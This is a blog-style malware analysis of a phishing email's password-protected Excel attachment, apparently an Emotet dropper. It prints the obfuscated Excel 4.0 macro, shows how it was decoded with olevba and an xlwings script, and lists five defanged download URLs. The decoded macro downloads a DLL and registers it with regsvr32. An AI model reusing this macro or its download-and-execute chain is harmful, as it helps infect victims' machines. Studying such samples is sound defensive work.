1 minute read

Sometime ago a friend of mine sent me a suspicious email containg a zip file with an xls, at the time I didn’t focus too much on what the file does and simple told him to do not open the file. On this morning I did the Malicious Word Documents Lesson so I tought it was time to analyze that file.

The email was send by spoofing the email of an employee, it contains a short message with a password and the name of the attached zip file.

Screenshot

By using the password “3733” reported in the email we can extract the xls file.

Screenshot

Obiviously the file is flagged as malicious by several security vendors.

Screenshot

Oleid told us that the file contains a XLM Macros.

Screenshot

The results of olevba shows the presence of hidden worksheets and Excel 4.0 macro sheet.

Screenshot

Using the Hide/Unhide function we can unhide all the sheets.

Screenshot

Screenshot

There are severals strings containing url and file names.

Screenshot

Screenshot

The PIMKE sheet contains the Excel 4.0 macro.

=FORMULA(Odjfs!P22&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!F18&Vghsg!D7&Vghsg!F18,C14)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB1"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!F20&Vghsg!D7&Vghsg!F18&Odjfs!P13,C16)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB2"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!H18&Vghsg!D7&Vghsg!F18&Odjfs!P13,C18)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB3"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!H20&Vghsg!D7&Vghsg!F18&Odjfs!P13,C20)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB4"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!J18&Vghsg!D7&Vghsg!F18&Odjfs!P13,C22)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB5"&Vghsg!Q7&Odjfs!H9&Odjfs!L2&Odjfs!B15&Odjfs!B15&Dghdb!C6&Dghdb!E10&Vghsg!B13&Dghdb!I2&Odjfs!H4&Dghdb!L8&Vghsg!I21&Dghdb!J20&Vghsg!D7&Vghsg!F18&Odjfs!P13,C24)=FORMULA(Odjfs!P22&Odjfs!J11&Odjfs!B18&Odjfs!P11&"IVFB6"&Vghsg!Q7&Odjfs!H9&Odjfs!B15&Odjfs!I17&Odjfs!I3&Odjfs!H13&Odjfs!P11&Odjfs!K9&Odjfs!P13&Odjfs!P7&Odjfs!P13,C26)=FORMULA(Odjfs!P22&Odjfs!H13&Odjfs!N4&Odjfs!H13&Odjfs!H9&Odjfs!P11&Odjfs!P15&Odjfs!H9&Odjfs!P20&Vghsg!M14&Vghsg!N10&Vghsg!I6&Vghsg!R18&Vghsg!S2&Odjfs!P15&Odjfs!P13,C28)=FORMULA(Odjfs!P22&Odjfs!F4&Odjfs!H13&Odjfs!E6&Odjfs!E11&Odjfs!G24&Odjfs!K23&Odjfs!P11&Odjfs!P13,C32)

Screenshot

At this point in order to decode the whole macro, we can copy and divide it in “sections”.

Screenshot

In order to decode each command we can use the Excel T function to get the string of each “section”, to do that we need to put the “=T” function instead of “=FORMULA” and remove the second parameter.

Screenshot

By putting the formula in the new worksheet Excel interpretes it and shows us some interesting strings.

Screenshot

By modify this script as follow we can get the clear text strings.

import xlwings as xw

wb = xw.Book('0 457.xls')

wks = xw.sheets
print("Available sheets :\n", wks)
mysheet = wks[6]

for i in range(1,10):
	print(str(mysheet.range("A"+str(i)).value).replace("\"&\"",""))
	print()

Following the deobfuscated commands.

Screenshot

The macro uses URLDownloadToFileA from urlmon in order to download a file and save it as txdn.dll, if the download does not succede it tries with the next one, if none of the five urls works it closes itself otherwise C:\Windows\SysWow64\regsvr32.exe is used to registry txdn.dll.

Malicious Urls:

  • https://decorusfinancial[.]com/wp-content/7dODakeZZ83fJi/
  • https://e-kinerja.ntbprov.go[.]id/aset/sAeaEvaSxGhvnsuFE/
  • http://facts-jo[.]com/init/jLQY2FpesnIGi0qHqz/
  • http://fashionbyprincessmelodicaah[.]com/4185PINT/jwh2cwjFHLZL/
  • http://easiercommunications[.]com/wp-content/yqNxi8IKbRIt7akB/

Malicious file:

  • txdn.dll

Searching on Google we can find that this is a well know malicious document related to Emotet.

Categories:

Updated: